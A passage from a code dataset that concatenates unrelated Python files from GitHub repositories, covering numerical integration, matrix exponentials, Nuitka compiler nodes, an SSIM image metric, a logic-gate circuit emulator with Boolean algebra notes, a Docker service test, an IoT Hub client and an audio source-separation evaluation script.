while err / accu > tol:
n0 *= 2
approx = RR1f(a, b, n0, m)
err = abs(accu - approx)
if n0 > n_max:
break
return (approx, n0, n0 <= n_max)
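# SR4f: composite Simpson's rule over n sub-intervals (fourth-order accurate).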
def SR4f(a, b, n, m):
ans = 0
delta = (b - a) / n
x = a - delta
for i in range(n):
x += delta
ans += (m.f(x)+4*m.f(x+delta/2)+m.f(x+delta))*delta/6
return ans
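# SR4a: adaptive wrapper around SR4f, with the same stopping rule as RR1a.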
def SR4a(a, b, n0, m, tol):
accu = integrate.quad(m.f, a, b)[0]
approx = SR4f(a, b, n0, m)
err = abs(accu - approx)
n_max = 1000000
while err / accu > tol:
n0 *= 2
approx = SR4f(a, b, n0, m)
err = abs(accu - approx)
if n0 > n_max:
break
return (approx, n0, n0 <= n_max)
```
#### File: 3/Problem 1/MatrixExponential.py
```python
import numpy as np # general numpy
import numpy.linalg as la # linear algebra routines
def mee(L,t): # compute the matrix exponential using eigenvalues
[d,d] = L.shape
lam, R = la.eig(L) # lam = eigenvalues, R = right eigenvectors
d_elamt = np.zeros([d,d]) # diagonal matrix with e^{-lambda_j t}
for j in range(d):
d_elamt[j,j] = np.exp( lam[j]*t)
return( R@[email protected](R), la.cond(d_elamt)) #cond computed using |A||A^-1|
def med(L, t, k): # compute the matrix exponential, differential equation
[d,d] = L.shape
n = 2**k # number of intervals
dt = t/n # time step
I = np.identity(d) # to make the next formula simpler
# S(dt) computed using 4 Taylor series terms in Horner's rule form
S = I + dt*L@( I + (1/2)*dt*L@( I + (1/3)*dt*L@( I + (1/4)*dt*L)))
# Raise this to the power n using repeated doublings S_j = S^{2^j} until j=k
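# (This relies on exp(t*L) = (exp((t/n)*L))**n with n = 2**k, so squaring S k times
# recovers the matrix exponential over the full interval.)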
for j in range(k):
S = S@S # S^{2^{j-1}} becomes S^{2^j} when you square it
return( S )
def meT(L,t, n): # compute the matrix exponential using Taylor series
[d,d] = L.shape
tLk = np.identity(d) # will be (tL)^k
kf = 1 # will be k! = k factorial
S = np.identity(d) # will be the answer = sum (1/k!)((tL)^k
max_norm = 0
for k in range(1,n):
kf = k*kf # multiply by k to turn (k-1)! into k!
tLk = t*( (tLk)@L) # turn (k-1)-th power into k-th power(tL)^k,
S += (1/kf)*tLk # (1/k!)(tL)^k is the k-th Taylor series term
max_norm = max(max_norm, la.norm((1/kf)*tLk))
return( S, max_norm )
# Physical parameters
d = 5 # size of the matrix
r_u = 2. # rate of going up: k -: k+1 transition
r_d = 5. # rate of going down: k -> k-1 transition
r_l = (r_u+r_d) # "loss rate" = rate to leave state k
t = 3. # time: Compute exp(tL)
# Computational parameters
n_T = 100 # number of Taylor series terms
k = 11 # n = 2^k intervals for Runge Kutta, dt = t/n
# The generator matrix L, with up rate on the super-diagonal
# and down rate on the sub-diagonal.
L = np.zeros([d,d])
for i in range(1,d):
L[ i ,i-1] = r_d
L[i-1, i ] = r_u
L[ 0 , 0 ] = - r_u
L[d-1,d-1] = - r_d
for i in range(1,d-1):
L[i,i] = -r_l
# Compute S = exp(tL) three ways
Se, cond = mee(L, t)
ST, max_norm = meT(L, t, n_T)
Sd = med(L, t, k)
# The RMS differences between the computed matrices
rms_eT = np.sqrt( np.sum( (Se - ST)**2))
rms_ed = np.sqrt( np.sum( (Se - Sd)**2))
rms_Td = np.sqrt( np.sum( (ST - Sd)**2))
# Formatted output
print("\nRMS differences between computed matrix exponentials\n")
runInfo = "up rate = {r_u:8.1f}, down rate = {r_d:8.1f}, dimension is {d:3d}\n"
runInfo = runInfo.format( r_u = r_u, r_d = r_d, d = d)
print( runInfo )
eT_info = "eigenvalue vs. Taylor series: {rms_eT:14.6e}, \
with {c:8.1e} condition number, {m:8.1e} and {n:4d} terms"
ed_info = "eigenvalue vs. RungeKutta: {rms_ed:14.6e}, \
with k = {k:2d}"
Td_info = "Runge Kutta vs. Taylor series: {rms_Td:14.6e}"
eT_info = eT_info.format( rms_eT = rms_eT, c = cond, m = max_norm, n = n_T)
ed_info = ed_info.format( rms_ed = rms_ed, k = k)
Td_info = Td_info.format( rms_Td = rms_Td)
print( eT_info)
print( ed_info)
print( Td_info)
```
#### File: 3/Problem 3/ReadParticleData.py
```python
import numpy as np # general numpy
SourcePointsFile = "SourcePoints.txt"
TargetPointsFile = "TargetPoints.txt"
# Source points
def read():
inFile = open( SourcePointsFile, "r") # open the source points file
firstLine = inFile.readline() # the first line has the number of points
nPoints = int(firstLine) # convert the number from string to int
sourcePoints = np.zeros([nPoints,3]) # the source points array
for p in range(nPoints):
dataLine = inFile.readline() # there is one point per line
words = dataLine.split() # each word is a number
x = np.float64(words[0]) # x, y, and z coordinates
y = np.float64(words[1]) # convert from string to float
z = np.float64(words[2])
sourcePoints[p,0] = x # save the numbers in the numpy array
sourcePoints[p,1] = y
sourcePoints[p,2] = z
inFile.close()
# target points
inFile = open( TargetPointsFile, "r") # open the source points file
firstLine = inFile.readline() # the first line has the number of points
nPoints = int(firstLine) # convert the number from string to int
targetPoints = np.zeros([nPoints,3]) # the source points array
for p in range(nPoints):
dataLine = inFile.readline() # there is one point per line
words = dataLine.split() # each word is a number
x = np.float64(words[0]) # x, y, and z coordinates
y = np.float64(words[1]) # convert from string to float
z = np.float64(words[2])
targetPoints[p,0] = x # save the numbers in the numpy array
targetPoints[p,1] = y
targetPoints[p,2] = z
inFile.close()
return sourcePoints, targetPoints
``` |
{
"source": "4O4/Nuitka",
"score": 2
} |
#### File: nuitka/nodes/BuiltinIntegerNodes.py
```python
from nuitka.__past__ import long # pylint: disable=I0021,redefined-builtin
from nuitka.PythonVersions import python_version
from nuitka.specs import BuiltinParameterSpecs
from .ConstantRefNodes import makeConstantRefNode
from .ExpressionBases import (
ExpressionChildrenHavingBase,
ExpressionSpecBasedComputationBase
)
from .shapes.BuiltinTypeShapes import (
ShapeTypeIntOrLong,
ShapeTypeIntOrLongDerived,
ShapeTypeLong,
ShapeTypeLongDerived
)
class ExpressionBuiltinInt1(ExpressionChildrenHavingBase):
kind = "EXPRESSION_BUILTIN_INT1"
named_children = ("value",)
def __init__(self, value, source_ref):
ExpressionChildrenHavingBase.__init__(
self,
values = {
"value" : value
},
source_ref = source_ref
)
def getTypeShape(self):
# TODO: Depending on input type shape and value, we should improve this.
return ShapeTypeIntOrLongDerived
def computeExpression(self, trace_collection):
value = self.getValue()
return value.computeExpressionInt(
int_node = self,
trace_collection = trace_collection
)
getValue = ExpressionChildrenHavingBase.childGetter("value")
class ExpressionBuiltinIntLong2Base(ExpressionSpecBasedComputationBase):
named_children = ("value", "base")
# Note: Version specific, may be allowed or not.
try:
int(base = 2)
except TypeError:
base_only_value = False
else:
base_only_value = True
# To be overloaded by child classes with int/long.
builtin = int
def __init__(self, value, base, source_ref):
if value is None and self.base_only_value:
value = makeConstantRefNode(
constant = '0',
source_ref = source_ref,
user_provided = True
)
ExpressionSpecBasedComputationBase.__init__(
self,
values = {
"value" : value,
"base" : base
},
source_ref = source_ref
)
getValue = ExpressionSpecBasedComputationBase.childGetter("value")
getBase = ExpressionSpecBasedComputationBase.childGetter("base")
def computeExpression(self, trace_collection):
value = self.subnode_value
base = self.subnode_base
if value is None:
if base is not None:
if not self.base_only_value:
return trace_collection.getCompileTimeComputationResult(
node = self,
computation = lambda : self.builtin(base = 2),
description = """\
%s built-in call with only base argument""" % self.builtin.__name__
)
given_values = ()
else:
given_values = (value, base)
return self.computeBuiltinSpec(
trace_collection = trace_collection,
given_values = given_values
)
class ExpressionBuiltinInt2(ExpressionBuiltinIntLong2Base):
kind = "EXPRESSION_BUILTIN_INT2"
builtin_spec = BuiltinParameterSpecs.builtin_int_spec
builtin = int
def getTypeShape(self):
return ShapeTypeIntOrLong
if python_version < 300:
class ExpressionBuiltinLong1(ExpressionChildrenHavingBase):
kind = "EXPRESSION_BUILTIN_LONG1"
named_children = ("value",)
def __init__(self, value, source_ref):
ExpressionChildrenHavingBase.__init__(
self,
values = {
"value" : value
},
source_ref = source_ref
)
def getTypeShape(self):
# TODO: Depending on input type shape and value, we should improve this.
return ShapeTypeLongDerived
def computeExpression(self, trace_collection):
return self.subnode_value.computeExpressionLong(
long_node = self,
trace_collection = trace_collection
)
getValue = ExpressionChildrenHavingBase.childGetter("value")
def mayRaiseException(self, exception_type):
return self.subnode_value.mayRaiseExceptionLong(exception_type)
class ExpressionBuiltinLong2(ExpressionBuiltinIntLong2Base):
kind = "EXPRESSION_BUILTIN_LONG2"
builtin_spec = BuiltinParameterSpecs.builtin_long_spec
builtin = long
def getTypeShape(self):
return ShapeTypeLong
``` |
{
"source": "4og/mssim",
"score": 3
} |
#### File: 4og/mssim/mssim.py
```python
import sys, os, numpy, scipy.misc
from scipy.ndimage import filters
class MSSIM:
def gaussian(self, size, sigma):
x = numpy.arange(0, size, 1, float)
y = x[:,numpy.newaxis]
xc = (size-1) / 2
yc = (size-1) / 2
gauss = numpy.exp(-((x-xc)**2 + (y-yc)**2) / (2*sigma**2))
return gauss / gauss.sum()
def compute(self, fn, fns, k=[0.01, 0.03]):
c1 = (k[0]*255)**2
c2 = (k[1]*255)**2
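# 11x11 Gaussian window with sigma = 1.5, the window used in the original SSIM paper (Wang et al., 2004).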
win = self.gaussian(11, 1.5)
im1 = scipy.misc.imread(fn, 1)
mu1 = filters.correlate(im1, win)
mu1_sq = mu1*mu1;
s1sq =filters.correlate(im1*im1, win)-mu1_sq
for f in fns:
im2 = scipy.misc.imread(f, 1)
if im1.shape != im2.shape:
print("{}: Incorrect image. All images "
"should be of equal size".format(f))
continue
mu2 = filters.correlate(im2, win)
mu2_sq = mu2*mu2;
mu1_mu2 = mu1*mu2;
s2sq = filters.correlate(im2*im2, win)-mu2_sq
s12 = filters.correlate(im1*im2, win)-mu1_mu2
ssims = ((2*mu1_mu2 + c1)*(2*s12 + c2))/ \
((mu1_sq + mu2_sq + c1)*(s1sq + s2sq + c2))
print("{:24} {:.4f}".format(os.path.basename(f), ssims.mean()))
if len(sys.argv) < 3:
print("Usage: mssim.py reference-image other-images ...")
exit()
MSSIM().compute(sys.argv[1], sys.argv[2:])
``` |
{
"source": "4ON91/KnickKnacks",
"score": 3
} |
#### File: KnickKnacks/Boolean Algebra Notes/LogicGates.py
```python
import copy
import csv
import os
class Gate:
def __init__(self, Sockets):
self.Sockets = Sockets
self.Inputs = []
self.UniqueInputs = ""
def canPass(self):
return(True)
def getInput(self, I):
if( (type(I) == Input) &
(I.sym().casefold() not in self.UniqueInputs.casefold()) ):
self.UniqueInputs += I.sym()
self.Inputs.append(I.On)
class Input:
def __init__(self, Symbol, On):
self.Symbol = Symbol.upper()[:1]
self.On = On
self.Position = (int, int)
def sym(self):
if(self.On):
return(self.Symbol.upper())
else:
return(self.Symbol.lower())
def csym(self):
return(self.Symbol.casefold())
def __repr__(self):
return(self.sym())
def __invert__(self):
if(self.On):
self.On = False
else:
self.On = True
def canPass(self):
return(False)
def canContinue(self, I):
return(True)
class Output:
def canPass(self):
return(True)
def canContinue(self, I):
return(True)
class AND(Gate):
def canContinue(self, I):
self.getInput(I)
if((True in self.Inputs)&
(False not in self.Inputs)&
(len(self.Inputs) >= self.Sockets)):
return(True)
else:
return(False)
class NAND(Gate):
def canContinue(self, I):
self.getInput(I)
if((False in self.Inputs)&
(True not in self.Inputs)&
(len(self.Inputs) >= self.Sockets)):
return(True)
else:
return(False)
class OR(Gate):
def canContinue(self, I):
self.getInput(I)
if( (len(self.Inputs) >= self.Sockets) &
(True in self.Inputs) ):
return(True)
else:
return(False)
class NOR(Gate):
def canContinue(self, I):
self.getInput(I)
if( (len(self.Inputs) >= self.Sockets) &
(False in self.Inputs) ):
return(True)
else:
return(False)
class INVERT:
def canPass(self):
return(True)
def canContinue(self, I):
~I
return(True)
class CircuitPath:
def __init__(self, Passable):
self.Passable = Passable
def canPass(self):
return(self.Passable)
def canContinue(self, I):
return(True)
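# SwitchStateList(n) enumerates every on/off combination of n switches as zero-padded
# binary strings, e.g. SwitchStateList(2) -> ['00', '01', '10', '11'].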
def SwitchStateList(NumberOfSwitches):
binary_string = ""
i = 0
Switches = NumberOfSwitches
Switch_States = []
while( len(binary_string) <= NumberOfSwitches ):
binary_string = str(bin(i))[2:]
i += 1
Switch_States.append(("{:>0%s}"%str(Switches)).format(binary_string))
Switch_States.pop(-1)
return(Switch_States)
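# ANDList is the letter-coded version of the same enumeration,
# e.g. ANDList(2) -> ['ab', 'aB', 'Ab', 'AB'] (lower case = switch off, upper case = on).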
def ANDList(NumberOfSwitches):
a = list("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
binary_string = ""
i = 0
Switches = NumberOfSwitches
Switch_States = []
while( len(binary_string) <= NumberOfSwitches ):
binary_string = ("{:>0%s}"%str(Switches)).format(str(bin(i))[2:])
b = ""
for x in range(0, len(binary_string)):
if(int(binary_string[x]) == 0):
b += a[x].lower()
else:
b += a[x].upper()
i += 1
Switch_States.append(b)
Switch_States.pop(-1)
return(Switch_States)
def RunCircuit(file):
OP1 = OR(1)
OP2 = OR(2)
OP3 = OR(3)
ON1 = NOR(1)
ON2 = NOR(2)
ON3 = NOR(3)
AP1 = AND(1)
AP2 = AND(2)
AP3 = AND(3)
AN1 = NAND(1)
AN2 = NAND(2)
AN3 = NAND(3)
CP0 = CircuitPath(False)
CP1 = CircuitPath(True)
I00 = Input("A", False)
I01 = Input("B", True)
I02 = Input("C", True)
OUT = Output()
INV = INVERT()
Circuit_Array = [line for line in csv.reader(open(file, "r"))]
for y in range(0, len(Circuit_Array)):
for x in range(0, len(Circuit_Array[0])):
exec("Circuit_Array[y][x] = " + Circuit_Array[y][x])
Circuit = copy.deepcopy(Circuit_Array)
Row = len(Circuit)-1
Col = len(Circuit[0])-1
Integers = []
Input_List = []
for y in range(0, len(Circuit)):
for x in range(0, len(Circuit[0])):
if(type(Circuit[y][x]) == Input):
Circuit[y][x].Position = (x,y)
Input_List.append(Circuit[y][x])
def BoolMove(Tile, Direction):
if(Tile.canPass()):
return(Direction)
else:
return("")
def GetDirection(Position, Direction):
X, Y = Position
if(Direction == "N"):
X, Y = X, Y-1
if(Direction == "E"):
X, Y = X+1, Y
if(Direction == "S"):
X, Y = X, Y+1
if(Direction == "W"):
X, Y = X-1, Y
return((X, Y))
def FindOutput(Input, CurrentPosition, Directions, Map, Length, Path, Globals):
X, Y = CurrentPosition
while(True):
if len(Directions) >= 2:
for Direction in Directions:
FindOutput(Input, (X,Y), Direction, copy.deepcopy(Map), Length, copy.deepcopy(Path), Globals)
return
Map[Y][X] = CP0
if( Globals[Y][X].canContinue(Input) ):
pass
else:
Integers.append([0, Input.sym(), Length, Path])
return
if(len(Directions) > 0):
Path.append(Directions)
X, Y = GetDirection((X,Y), Directions)
if( type(Globals[Y][X]) == Output):
Integers.append([1, Input.sym(), Length, Path])
return
Directions = ""
if(Y-1 >= 0):
Directions += BoolMove(Map[Y-1][X], "N")
if(X+1 <= Col):
Directions += BoolMove(Map[Y][X+1], "E")
if(Y+1 <= Row):
Directions += BoolMove(Map[Y+1][X], "S")
if(X-1 >= 0):
Directions += BoolMove(Map[Y][X-1], "W")
if len(Directions) == 0:
Integers.append([0, Input.sym(), Length, Path])
return
Length += 1
Input_List.sort(key = Input.csym)
for I in Input_List:
FindOutput(I, I.Position, "", copy.deepcopy(Circuit), 0, [], Circuit_Array)
return(Integers)
EmulatedCircuit = RunCircuit("T01.txt")
for line in EmulatedCircuit:
print(line)
"""
C * ( (A*B) + (a*B) )
C * ( (A*b) + a )
A * ( (B*c) + (b*C) + (a*B) ) * B
C * ( (B*C*a) + (a * (B+C)) )
A - 835
Simplifying circuit
ab + aB + Ab
a*(B+b) + Ab
a*(1) + Ab
a + Ab
(A+aB)*(B+bA)
(A*B) + (A*bA) + (aB * B) + (aB*bA)
AB + Ab + aB + aBbA (Switches can't be on and off at the same time so we get rid of aBbA)
AB + Ab + aB + 0
AB + Ab + aB
A*(B+b) + aB (We simplify the equation now by grouping like terms)
A(B+b) + aB (and again; Switches can't be on and off at the same time so we get rid of Bb)
A + aB (and we're left with this)
ABc + ABC + aBC
AB(c+C) + aBC = (ABc + ABC + aBC, but simplified)
AB(1) + aBC (Adding a switch's opposite to itself is equal to '1')
AB + aBC (A switch multiplied by 1 is equal to itself)
B(A + aC)
abC + aBC + AbC + ABC
bC(Aa) + BC(Aa)
bC(1) + BC(1)
bC + BC
C(Bb) = bC + BC
C(1)
C
0
1
10
11
100
101
110
111
1000
1001
1010
1011
1100
1101
1110
1111
Ac + a(B+C) + AB(C+b)
Ac + aB + aC + ABC + ABb
Ac + aB + aC + ABC + A(0) ( A switch multiplied by its opposite is equal to '0')
Ac + aB + aC + ABC
A(c+BC) + aB + aC (Rule 17: A + aB = A+B)
A(c+B) + aB + aC
Ac + AB + aB + aC
Ac + B(A+a)
Ac + B + aC (Simplify until you have a set of unique variables)
AbC + AB(aC) + BC(bA)
AbC + ABa + ABC + BCb + BCA
AbC + 0*B + ABC + 0*C + ABC
AbC + ABC + ABC (ABC + ABC = ABC)
AbC + ABC
AC(b+B)
AC(1)
AC
HEM 11 46 105
835
1
ab + aB
a(b + B)
a
2
aB + AB + ab
a(B+b) + AB
a + AB
3
ab + Ab + b(A+a)
ab + Ab + b(1)
ab +Ab + b
b(Aa) + b
b(1) + b
b + b
b
4
Ab + A(B+b) + AB
Ab + AB + Ab + AB
Ab + Ab = Ab
AB + AB = AB
Ab + AB
A(Bb)
A
5
(A+AB)*(B+BA)
(AB) + (A*AB) + (AB*B) + (AB*AB)
AB + (A*A)B + A(B*B) + AB
AB + A(B) + A(B) + AB
AB
6
abC + aBC + AbC
bC(a + A) + aBC
bC(a + A) + aBC
bC(1) + aBC
bC + aBC
C(b + aB)
7
Abc + ABC + aBC
Abc + BC(A+a)
Abc + BC
8
abc + aBC + Abc
bc(a+A) + aBC
bc + aBC
9
abc + abC + Abc + AbC
ab(c+C) + Ab(c+C)
ab + Ab
b(A+a)
b
10
AbC + ABC + ABc + aBc
AbC + ABC + Bc(A+a)
AbC + ABC + Bc
AC(b+B) + Bc
AC + Bc
11
C(AB+Ab) + c(ab+aB)
ABC + AbC + abc + aBc
AC(B+b) + ac(b+B)
AC + ac
12
c(ab + AB + Ab) + A(BC + bC)
abc + ABc + Abc + ABC + AbC
abc + A(Bc + bC) + A(bc+BC)
abc + A + A
abc + A -shallow simplification
c(ab + AB + Ab) + A(BC+ bC)
abc + ABc + Abc + ABC + AbC
bc(a+A) + ABc + ABC + AbC
bc + ABc + ABC + AbC
bc + AB(c+C) + AbC
bc + AB + AbC
b(c + AC) + AB
b(c+A) + AB
bc + Ab + AB
bc + A(b+B)
bc + A -deeper simplification
A + bc
AbC * aBc
11.4 106 De Morgan's laws
NOT(Ab+C) * (a + NOT(Bc)) (complement bars from the textbook written here as NOT)
t1: (a+B)*c = ac + Bc
t2: a + (b+C) = a + b + C
(ac+Bc)*(a+b+C)
aac + abc + acC + aBc + Bbc + BcC
ac + abc + 0 + aBc + 0 + 0
ac + abc + aBc
ac(B+b) + ac
ac + ac
ac
NOT(aB) + NOT(a+B)
(A+b)+A*b
A+Ab+b (absorption: A + Ab = A, regardless of b's state)
A+b
HEM 11.4 E47 107
1
(ab) * NOT(aB)
(ab)*(A+b)
Aab + abb
0 + ab
ab
2 __ __
(A+BC)+(AB+C) = a+b+C
((A+b)*c) + (a+b+C)
Ac+bc+a+b+C
(a+Ac)+(b+bc)+C
a+b+C
3
NOT(aB+Bc) * NOT(Ab)
((A+b)*(b+C))*(a+B)
(Ab+AC+bb+bC)*(a+B)
Aab+ABb+AaC+ABC+abb+Bbb+abC+BbC
0+0+0+ABC+ab+0+abC+0
ABC+ab+abC (absorption: ab + abC = ab(1+C) = ab)
ABC + ab
4
(NOT(Ab) + NOT(Bc)) + NOT(aB)
(a+B+b+C)+(A+b)
a+B+b+C+A+b
(A+a)+(B+b)+C
1 + 1 + C
(C+1) + 1
1 + 1 = 1 (in Boolean algebra anything OR'd with 1 is 1, so the expression is always true)
5
(NOT(Ab) + NOT(aC)) * (a * NOT(BC)) = a(b+c)
(a+B+A+c)*(a*(b+c))
(a+B+A+c)*(ab+ac)
aab+aac+aBb+aBc+Aab+Aac+abc+acc
ab+ac+0+aBc+0+0+abc+ac
ab+ac+aBc+abc+ac
(ac+ac)+(ab+aBc)+(ac+acb)
ac+ab+ac
ac+ab
a(b+c)
"""
``` |
{
"source": "4or5trees/azure-iot-starter-kits",
"score": 3
} |
#### File: modules/speech-to-text/hubmanager.py
```python
import os
import sys
import iothub_client
from iothub_client import IoTHubModuleClient, IoTHubClientError, IoTHubTransportProvider
# messageTimeout - the maximum time in milliseconds until a message times out.
# The timeout period starts at IoTHubClient.send_event_async.
# By default, messages do not expire.
MESSAGE_TIMEOUT = 10000
class HubManager(object):
def __init__(self, connection_string = None, protocol = IoTHubTransportProvider.MQTT):
if not connection_string:
connection_string = os.environ['EdgeHubConnectionString']
print("\nPython %s\n" % sys.version)
print("IoT Hub Client for Python")
print("Starting the IoT Hub Python sample using protocol %s..." % protocol)
self.client = IoTHubModuleClient()
self.client.create_from_environment(protocol)
# set the time until a message times out
self.client.set_option("messageTimeout", MESSAGE_TIMEOUT)
# some embedded platforms need certificate information
self.set_certificates()
def set_certificates(self):
CERT_FILE = os.environ['EdgeModuleCACertificateFile']
print("Adding TrustedCerts from: {0}".format(CERT_FILE))
# this brings in x509 privateKey and certificate
with open(CERT_FILE) as file:
try:
self.client.set_option("TrustedCerts", file.read())
print("set_option TrustedCerts successful")
except IoTHubClientError as iothub_client_error:
print("set_option TrustedCerts failed (%s)" % iothub_client_error)
``` |
{
"source": "4p00rv/docker-release-process",
"score": 2
} |
#### File: docker-release-process/tests/test_server.py
```python
from .context import UpdateEndpoint, Authorize
import docker
import unittest
try:
from unittest import mock
except ImportError:
import mock
class ServerTestSuite(unittest.TestCase):
def test_authorize(self):
self.assertFalse(Authorize('abcd'))
self.assertTrue(Authorize('DEKU_TEST_TOKEN'))
@mock.patch('deku.server.flask')
@mock.patch('deku.server.docker')
def test_update_call(self, mockFlask, mockDocker):
mockFlask.Flask = mock.Mock()
mockFlask.request = mock.Mock()
mockFlask.request.values = mock.Mock()
mockClient = mock.Mock()
def get_arg(arg):
if arg in args: return args[arg]
with mock.patch('deku.server.Services', side_effect=lambda base_url=None: mockClient):
with mock.patch('deku.server.flask.request.values.get', side_effect=get_arg):
args = { 'name': 'rpc' }
res = UpdateEndpoint()
self.assertEqual(res, {'error': 'Invalid secret.'})
args = { 'name': 'rpc','secret': 'DEKU_TEST_TOKEN' }
res = UpdateEndpoint()
mockClient.get_status.assert_called_with(filters={'name': args['name']})
args['image'] = 'SomeImage'
res = UpdateEndpoint()
func_args = { 'update_config': {'image': args['image']}, 'filters': {'name': args['name']} }
mockClient.update.assert_called_with(**func_args)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "4p0pt0Z/Audio_blind_source_separation",
"score": 3
} |
#### File: 4p0pt0Z/Audio_blind_source_separation/separation_examples_and_compute_metrics.py
```python
import librosa
import argparse
import numpy as np
import warnings
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import scale as mscale
from matplotlib import transforms as mtransforms
from separator import AudioSeparator
import librosa.display
import os
class MelScale(mscale.ScaleBase):
r"""Mel Scale transform for axis in plots
Here we want to use the Mel scale, with ticks values in kHz.
WARNING: There is a bug at the moment and the scale does not adjust to the extremal values of the axis.
See https://matplotlib.org/gallery/scales/custom_scale.html for example of using custom scale.
"""
name = 'mel'
def __init__(self, axis, *, fmin=0.0, fmax=8.0, **kwargs):
mscale.ScaleBase.__init__(self)
self.fmin = fmin
self.fmax = fmax
def get_transform(self):
return self.MelTransform()
def set_default_locators_and_formatters(self, axis):
pass
def limit_range_for_scale(self, vmin, vmax, minpos):
return self.fmin, self.fmax
class MelTransform(mtransforms.Transform):
input_dims = 1
output_dims = 1
is_separable = True
has_inverse = True
def __init__(self):
mtransforms.Transform.__init__(self)
def transform_non_affine(self, a):
return librosa.hz_to_mel(a * 1000.0)
def inverted(self):
return MelScale.InvertedMelTransform()
class InvertedMelTransform(mtransforms.Transform):
input_dims = 1
output_dims = 1
is_separable = True
has_inverse = True
def __init__(self):
mtransforms.Transform.__init__(self)
def transform_non_affine(self, a):
return librosa.mel_to_hz(a) / 1000.0
def inverted(self):
return MelScale.MelTransform()
def main():
r"""This script was used to generate the spectrograms and masks pictures of the master thesis for the section
about the TUT rare sound event 2017 data set.
It does:
- creates an AudioSeparator from a model checkpoint
- use the model to get separation masks for an example of each class
- saves the mask figures to a folder that has the model checkpoint name, next to the model.
- run evaluation of the model on the validation set and prints the results
"""
# Register Mel scale
mscale.register_scale(MelScale)
# Get model checkpoint path and the folder where the audio separated by the model will be saved
parser = argparse.ArgumentParser(allow_abbrev=False,
description="For the model specified by input, computes the separated audio "
"files of the ICASP2018 challenge, then evaluate the separation "
"metrics")
parser.add_argument("--sep_audio_folder", type=str, required=True,
help="Folder to store the separated audio files.")
parser.add_argument("--model_ckpt", type=str, required=True,
help="Path to the checkpoint of the model to evaluate.")
user_args = vars(parser.parse_known_args()[0])
model_ckpt = user_args['model_ckpt']
separated_audio_folder = user_args['sep_audio_folder']
# Load model in separation and evaluation framework
synthetizer = AudioSeparator.from_checkpoint(
{"checkpoint_path": model_ckpt, "separated_audio_folder": separated_audio_folder})
# Path to the folder were to save the pictures
save_path = os.path.join(os.path.dirname(model_ckpt),
os.path.splitext(os.path.basename(model_ckpt))[0] + '_figures')
if not os.path.exists(save_path):
os.makedirs(save_path)
else:
raise RuntimeError('Figure directory already exists ! ')
# Run Separation on 1 example of each class, and save the figures
baby_cry_example = 17
_, babycrymask = synthetizer.model(synthetizer.data_set.__getitem__(baby_cry_example)[0].unsqueeze(0))
babycrymask = babycrymask.detach().clone().squeeze()[0]
fig1, axs = plt.subplots(1, 1, figsize=(5, 3))
axs.pcolormesh(np.arange(babycrymask.shape[1]) * synthetizer.data_set.config['STFT_frame_shift_ms'] / 1000,
librosa.filters.mel_frequencies(64, fmin=1, fmax=8000) / 1000,
np.squeeze(babycrymask),
cmap='magma', vmin=0.0, vmax=1.0, zorder=0)
axs.set_yscale('mel')
plt.locator_params(axis='y', nbins=4)
plt.tight_layout()
plt.show()
fig1.savefig(os.path.join(save_path, 'babycry_mask.svg'), format='svg', bbox_inches='tight')
fig1.savefig(os.path.join(save_path, 'babycry_mask.eps'), format='eps', bbox_inches='tight')
fig1.savefig(os.path.join(save_path, 'babycry_mask.pdf'), format='pdf', bbox_inches='tight')
gunshot_example = 50
_, gunshotmask = synthetizer.model(synthetizer.data_set.__getitem__(gunshot_example)[0].unsqueeze(0))
gunshotmask = gunshotmask.detach().clone().squeeze()[1]
fig2, axs = plt.subplots(1, 1, figsize=(5, 3))
axs.pcolormesh(np.arange(gunshotmask.shape[1]) * synthetizer.data_set.config['STFT_frame_shift_ms'] / 1000,
librosa.filters.mel_frequencies(64, fmin=1, fmax=8000) / 1000,
np.squeeze(gunshotmask),
cmap='magma', vmin=0.0, vmax=1.0, zorder=0)
axs.set_yscale('mel')
plt.locator_params(axis='y', nbins=4)
plt.tight_layout()
plt.show()
fig2.savefig(os.path.join(save_path, 'gunshot_mask.svg'), format='svg', bbox_inches='tight')
fig2.savefig(os.path.join(save_path, 'gunshot_mask.eps'), format='eps', bbox_inches='tight')
fig2.savefig(os.path.join(save_path, 'gunshot_mask.pdf'), format='pdf', bbox_inches='tight')
glassbreak_example = 131
_, glassbreakmask = synthetizer.model(synthetizer.data_set.__getitem__(glassbreak_example)[0].unsqueeze(0))
glassbreakmask = glassbreakmask.detach().clone().squeeze()[2]
fig3, axs = plt.subplots(1, 1, figsize=(5, 3))
axs.pcolormesh(np.arange(glassbreakmask.shape[1]) * synthetizer.data_set.config['STFT_frame_shift_ms'] / 1000,
librosa.filters.mel_frequencies(64, fmin=1, fmax=8000) / 1000,
np.squeeze(glassbreakmask),
cmap='magma', vmin=0.0, vmax=1.0, zorder=0)
axs.set_yscale('mel')
plt.locator_params(axis='y', nbins=4)
plt.tight_layout()
plt.show()
fig3.savefig(os.path.join(save_path, 'glassbreak_mask.svg'), format='svg', bbox_inches='tight')
fig3.savefig(os.path.join(save_path, 'glassbreak_mask.eps'), format='eps', bbox_inches='tight')
fig3.savefig(os.path.join(save_path, 'glassbreak_mask.pdf'), format='pdf', bbox_inches='tight')
# Run separation for all files in the validation set
synthetizer.separate(separation_method='in_lin')
# Compute the separation metrics for all files in the validation data set.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
sdrs, sirs, sars = synthetizer.evaluate_separation()
# Print the separation results per class and mixture.
# {class} mixes: the mixture file contains an event and background noise
# {class} only: the mixture file only contains the event.
indices_babycry = np.where(synthetizer.data_set.labels.cpu().numpy()[:, 0] == 1)[0]
indices_glassbreak = np.where(synthetizer.data_set.labels.cpu().numpy()[:, 1] == 1)[0]
indices_gunshot = np.where(synthetizer.data_set.labels.cpu().numpy()[:, 2] == 1)[0]
indices_background = np.where(synthetizer.data_set.labels.cpu().numpy()[:, 3] == 1)[0]
indices_babycry_mix = np.intersect1d(indices_babycry, indices_background)
indices_glassbreak_mix = np.intersect1d(indices_glassbreak, indices_background)
indices_gunshot_mix = np.intersect1d(indices_gunshot, indices_background)
indices_babycry_only = np.setdiff1d(indices_babycry, indices_background)
indices_glassbreak_only = np.setdiff1d(indices_glassbreak, indices_background)
indices_gunshot_only = np.setdiff1d(indices_gunshot, indices_background)
format_string = 'mean {:^9.4f}, std {:^9.4f}, median {:^9.4f}\nSIR: mean {:^9.4f}, std {:^9.4f}, ' \
'median {:^9.4f}\nSAR: mean {:^9.4f}, std {:^9.4f}, median {:^9.4f}'
print('Babycry mixes\nSDR: ' + format_string.format(
